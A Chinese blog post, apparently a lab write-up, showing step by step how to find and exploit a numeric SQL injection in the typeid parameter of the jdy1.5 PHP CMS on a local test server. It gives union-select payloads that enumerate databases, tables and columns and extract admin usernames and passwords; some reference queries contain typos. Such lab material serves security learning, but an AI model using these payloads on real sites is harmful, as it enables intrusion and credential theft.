• SQL注入实战---jdy1.5


    环境搭建

    • 这里使用的windows2003+phpstudy2018+sdy1.5
    • 我们解压sdy1.5至phpstudy下WWW文件内,在浏览器中输入127.0.0.1/sdy1.5进行安装
    • 技术图片
       
    • 然后就进入到了首页
    •  

    1.观察当前页面的URL:http://192.168.50.100/jdy1.5/typeid.php?typeid=2

    我们发现此处的typeid特别像此前sql-lab中的id参数,可以尝试一下注入。
    输入命令:  ?typeid=2 and 1=1
    观察到页面没有变化

     

    输入命令: ?typeid=2 and 1=2
    此时我们观察出与以前的页面发生了变化,可以断定此处存在 数字型的SQL注入。(所以不用考虑参数闭合的问题)

     2.

      • 此时,根据往常的思路,我们通过order by 语句判断出数据库的列数。
        输入命令:?typeid =2  order by 5
                          ?typeid = 2  order by 6
        5正常回显,6错误回显,判断出列数为5.
        技术图片3、我们以联合查询(union select)为例,观察回显位置。

     

    4、  构造语句 查看当前数据库

    在进行爆库爆表等等操作之前,先来回忆一下这些核心语句。
    information_schema 系统默认数据库
    三个重要的表
    schemata(schema_name)
    tables(table_schema,table_name)
    columns(table_schema,table_name,column_name)


    select schema_name from information_schema.schemata; 爆库
    select table_name from information_schema.shcemata where table_schema=‘dvwa‘; 爆表
    select column_name from information_schema.columns where table_name=‘users‘ and colunm_name =‘dvwa‘;爆列
    select username,password from dvwa.users;爆内容

    4、爆库

    union  select 1,group_concat(schema_name),3,4,5 from information_schema.schemata

     

     

    6、爆表

    union  select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=0x6a6479636d73

    此时数据库jdycm   不可以直接使用    需要将其转换成十六进制或者依旧用datbase()代替。

    表名如下:
    jdy_admin,jdy_kh,jdy_leavewords,jdy_newscontent,jdy_newstype,jdy_settings

    7、爆列

    union  select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database() and table_name=0x6a64795f61646d696e

     

    列名  id,username,password,qx,addtime

     

    8、爆字段 union select 1,group_concat(username,0x7e,password),3,4,5 from jdycms.jdy_admin

     

     

     

     

  • 相关阅读:
    [BZOJ4199][NOI2015]品酒大会
    [BZOJ4198][Noi2015]荷马史诗
    [BZOJ4197][Noi2015]寿司晚宴
    [BZOJ4196][NOI2015]软件包管理器
    2016-11-15NOIP模拟赛
    2016.6.30模拟赛
    BZOJ3672: [Noi2014]购票
    UOJ#191. 【集训队互测2016】Unknown
    第四届CCF软件能力认证(CSP2015) 第五题(最小花费)题解
    bzoj3926: [Zjoi2015]诸神眷顾的幻想乡 对[广义后缀自动机]的一些理解
  • 原文地址:https://www.cnblogs.com/xingyuner/p/12815189.html
Copyright © 2020-2023  润新知